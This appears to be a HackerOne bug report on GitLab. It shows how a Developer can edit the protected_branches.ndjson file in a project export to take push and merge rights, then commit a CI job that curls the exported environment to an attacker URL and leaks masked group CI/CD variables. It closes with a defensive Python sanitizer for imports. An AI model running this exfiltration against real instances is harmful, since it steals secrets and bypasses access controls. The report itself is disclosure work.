User with developer role (group) can modify Protected branches setting on imported project and leak group CI/CD variables
HackerOne report #1939987 by js_noob
on 2023-04-09, assigned to @fvpotvin:
Report
Summary
Hello team, a user with the Developer role (group) can steal masked group/project CI/CD variables by modifying Project settings -> Protected branches on an imported project (through the `tree/project/protected_branches.ndjson` file in the export archive). No victim interaction is needed.
Steps to reproduce
- Create 2 accounts
- Create a group with account A and add masked group CI/CD variables (Group settings -> CI/CD -> Variables)
- Create a personal project with account B and export it
- Invite account B (Developer) to account A's (Owner) group
- With account B, unpack the project export and open `tree/project/protected_branches.ndjson`
- Set all occurrences of `access_level` to `null` and all occurrences of `user_id` to the developer's (account B's) user id; each line will then look similar to this:

```json
{"project_id":44833383,"name":"main","created_at":"2023-04-02T13:43:17.065Z","updated_at":"2023-04-02T13:43:17.065Z","code_owner_approval_required":false,"allow_force_push":false,"merge_access_levels":[{"access_level":null,"created_at":"2023-04-02T13:43:17.067Z","updated_at":"2023-04-02T13:43:17.067Z","user_id":12794759,"group_id":null}],"push_access_levels":[{"access_level":null,"created_at":"2023-04-02T13:43:17.069Z","updated_at":"2023-04-02T13:43:17.069Z","user_id":12794759,"group_id":null}],"unprotect_access_levels":[]}
```

- Repack the archive (tar.gz) and import the modified project into account A's group as account B
- The protected branch should be restricted to Maintainers by default; instead, it is fully accessible (push and merge) to the developer
- Create a `.gitlab-ci.yml` file with the following content:

```yaml
image: ruby:latest
job_name:
  script:
    - export > test.txt
    - curl -X POST --data "$(cat test.txt)" (attacker controlled website's url)
```

- Commit and verify that the group CI/CD variables are disclosed
For simplicity, you can create the variables in step 2 unmasked and use the following `.gitlab-ci.yml`, so that no external server is required:

```yaml
image: ruby:latest
job_name:
  script:
    - echo $VAR
```
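The following is an illustrative import-side check, added here as an example; it is not part of the report and not GitLab's own code or fix. It parses lines in the `tree/project/protected_branches.ndjson` format and rejects access-level entries that the importer could not have created through the UI: a `user_id` rule pointing at a user below Maintainer in the target group, a `group_id` rule for a group that is not in an allowed set, or a role rule whose `access_level` is not one of GitLab's valid values (which catches the nulled entries from the steps above). If every push or merge rule of a branch is rejected, the branch falls back to Maintainer-only. The sample lines, the user ids, the membership table and the function names are constructed for the example; the numeric role values (Developer = 30, Maintainer = 40) are GitLab's documented ones.

```python
import json
from typing import Any

# GitLab's documented numeric access levels (Guest=10, Reporter=20,
# Developer=30, Maintainer=40, Owner=50); only two are needed here.
DEVELOPER, MAINTAINER = 30, 40
# access_level values GitLab accepts for role-based protected-branch rules:
# 0 = No one, 30 = Developers + Maintainers, 40 = Maintainers.
ROLE_LEVELS = {0, DEVELOPER, MAINTAINER}
# Rule GitLab applies to a freshly protected branch: Maintainers only.
MAINTAINER_ONLY = {"access_level": MAINTAINER, "user_id": None, "group_id": None}

# Constructed sample, not a real export. The first line mirrors the edited
# entry from the report (access_level nulled, user_id set to the importer);
# the second is an untouched Maintainer-only rule.
SAMPLE_NDJSON = (
    '{"project_id":1,"name":"main","allow_force_push":false,'
    '"merge_access_levels":[{"access_level":null,"user_id":1001,"group_id":null}],'
    '"push_access_levels":[{"access_level":null,"user_id":1001,"group_id":null}],'
    '"unprotect_access_levels":[]}\n'
    '{"project_id":1,"name":"release","allow_force_push":false,'
    '"merge_access_levels":[{"access_level":40,"user_id":null,"group_id":null}],'
    '"push_access_levels":[{"access_level":40,"user_id":null,"group_id":null}],'
    '"unprotect_access_levels":[]}\n'
)

# Hypothetical membership table of the target group: user id -> access level.
MEMBERSHIPS = {1001: DEVELOPER, 2002: MAINTAINER}


def parse_ndjson(text: str) -> list[dict[str, Any]]:
    """One JSON object per non-empty line, as in protected_branches.ndjson."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def sanitize_levels(levels, memberships, allowed_groups=frozenset(), require_rule=True):
    """Keep only entries the importer could legitimately have created.

    Returns (kept, reasons). With require_rule=True (push/merge lists) an
    empty result is replaced by the Maintainer-only default.
    """
    kept, reasons = [], []
    for entry in levels:
        user_id = entry.get("user_id")
        group_id = entry.get("group_id")
        level = entry.get("access_level")
        if user_id is not None:
            # A per-user rule must name someone already holding Maintainer.
            if memberships.get(user_id, 0) >= MAINTAINER:
                kept.append(entry)
            else:
                reasons.append(f"user {user_id} is below Maintainer in the target group")
        elif group_id is not None:
            if group_id in allowed_groups:
                kept.append(entry)
            else:
                reasons.append(f"group {group_id} is not an allowed invited group")
        elif level in ROLE_LEVELS:
            kept.append(entry)
        else:
            # Covers access_level null with no user/group, which the UI never produces.
            reasons.append(f"invalid role access_level {level!r}")
    if require_rule and not kept:
        kept = [dict(MAINTAINER_ONLY)]
    return kept, reasons


def sanitize_branch(branch, memberships, allowed_groups=frozenset()):
    """Return a sanitized copy of one protected-branch record plus rejection reasons."""
    clean, reasons = dict(branch), []
    for key, require_rule in (("push_access_levels", True),
                              ("merge_access_levels", True),
                              ("unprotect_access_levels", False)):
        kept, why = sanitize_levels(branch.get(key, []), memberships, allowed_groups, require_rule)
        clean[key] = kept
        reasons.extend(f"{branch['name']}/{key}: {r}" for r in why)
    return clean, reasons


def audit_export(text, memberships, allowed_groups=frozenset()):
    """Sanitize every branch in an ndjson export; returns (branches, all_reasons)."""
    branches, all_reasons = [], []
    for branch in parse_ndjson(text):
        clean, reasons = sanitize_branch(branch, memberships, allowed_groups)
        branches.append(clean)
        all_reasons.extend(reasons)
    return branches, all_reasons


if __name__ == "__main__":
    cleaned, findings = audit_export(SAMPLE_NDJSON, MEMBERSHIPS)
    for f in findings:
        print("rejected:", f)
    print(json.dumps(cleaned, indent=2))
```

Run against the constructed sample, the `main` record loses both of its per-user rules (user 1001 is only a Developer) and is reset to Maintainer-only for push and merge, while the untouched `release` record passes unchanged. A check of this shape would have to run inside the importer, after the export archive is unpacked and before any protected-branch rows are written, because nothing downstream (including the CI/CD variable protection that depends on the branch being protected) re-validates those rows.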
Reference
Video/POC
Redacted
Impact
Users with the Developer role (group) can steal masked group and project CI/CD variables. The developer can also modify the main branch without a Maintainer's permission.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: